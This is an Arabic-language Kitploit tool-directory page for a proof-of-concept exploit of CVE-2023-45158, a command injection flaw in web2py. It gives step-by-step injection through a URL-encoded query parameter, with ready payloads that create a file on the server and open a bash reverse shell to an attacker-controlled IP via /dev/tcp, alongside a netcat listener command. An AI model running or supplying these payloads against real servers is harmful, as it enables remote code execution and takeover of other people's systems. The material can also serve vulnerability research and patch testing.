Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-45158 — استغلال إثبات المفهوم لـ CVE-2023-45158، وهي ثغرة حقن أوامر في web2py. يوضح تنفيذ تعليمات برمجية عن بعد عبر طلبات HTTP مصممة، بما في ذلك إنشاء الملفات وحمولات الصدفة العكسية. | Kitploit
أدوات/GitHubGitHub/yifanzhg/cve-2023-45158
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubyifanzhg/cve-2023-45158

CVE-2023-45158

استغلال إثبات المفهوم لـ CVE-2023-45158، وهي ثغرة حقن أوامر في web2py. يوضح تنفيذ تعليمات برمجية عن بعد عبر طلبات HTTP مصممة، بما في ذلك إنشاء الملفات وحمولات الصدفة العكسية.

عرض المستودع
41منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-45158

الخطوات

  1. قم بتشغيل خادم الويب
root@kitploit:~
cd web2py
python3 web2py.py
  1. قم بحقن أمرك باستخدام الرابط http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27. استبدل <IP-ADDRESS> و <YOUR-COMMAND> بالقيم الخاصة بك.

أمثلة

  1. إنشاء ملف على الخادم

http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27

  1. غلاف عكسي (Reverse Shell)

على جهاز المهاجم، قم بتشغيل nc -l 127.0.0.1 8080

اذهب إلى الرابط http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27. استبدل <ATTACKER-IP>.

تنزيل الأداة